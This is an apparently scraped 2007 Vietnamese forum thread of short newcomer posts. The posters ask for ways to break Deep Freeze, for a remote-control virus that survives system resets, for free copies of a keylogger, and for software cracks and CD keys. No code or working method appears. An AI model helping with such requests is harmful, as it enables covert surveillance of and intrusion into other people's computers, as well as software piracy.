được sao thoải mái
kimsoodee
04-15-2007, 06:55 PM
mấy anh ơi cho em hỏi , cái phần uses infomation mình ghi cái ji` zay , em ko bít làm phần đó xin
mấy anh chỉ em , chỉ em cai tao host lun nha , em là 1 newbie thôi
long9a6
04-16-2007, 04:42 PM
ai cho cho em link phá đóng băng cái nào
vungve
04-16-2007, 10:16 PM
Ai biết con vius điều khiển từ xa mà khi cài lên nó bám vào deepfree ko?
Dù bạn có reset máy thì con virus đó vẫn bám ở đó.Khi nào bật máy lên thì mình có thể điều khiển
và nhận mail từ 1 máy khác. Tên con virus là black...
Ai biết chỉ mọi người với.
Nh0c'P0or
04-18-2007, 11:55 AM
sac !
co' ai bit' cach' na`o pha' key hok !
mi`nh bi key am` chang bit' cach pha'
chi? giu`m nha !
thatswhy123
04-18-2007, 03:17 PM
Các anh ơi cho anh hỏi . fiên bản key logger v1.62 và 1.63 làm sao để có được Foder của nó . vào
trang web nó bắt mua cơ .mà nếu không có Foder thì có cài được không vậy
sieutromkid
04-19-2007, 07:53 PM
làm được đến bước cuối rồi thì chẳng biết tìm Reset to Factory Default hay WAN đâu cả...
chán...

làm được đến bước cuối rồi thì chẳng biết tìm Reset to Factory Default hay WAN đâu cả...
chán...
thatswhy123
04-20-2007, 08:58 AM
Anh em ơi cho tôi trang nào download mà không fải mua CD key với . Tôi vào trang nào cũng đòi
CDkey cả ,không cài được .Liên lạc với tôi nha hacker.liberty Tôi cò phá đóng băng này
votranquangkhoa
04-21-2007, 05:55 PM
bay kieu gi ma cha hieu gi het co the giai thich cho minh hieu them duoc ko
thatswhy123
05-01-2007, 08:01 PM
Chán vãi . không co CDkey cài bằng niềm tin à

You might also like